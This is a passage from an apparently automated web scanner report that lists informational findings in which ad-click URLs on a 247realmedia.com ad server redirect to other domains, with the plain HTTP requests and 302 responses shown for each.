Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:38:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

Response

20.478. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.480. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
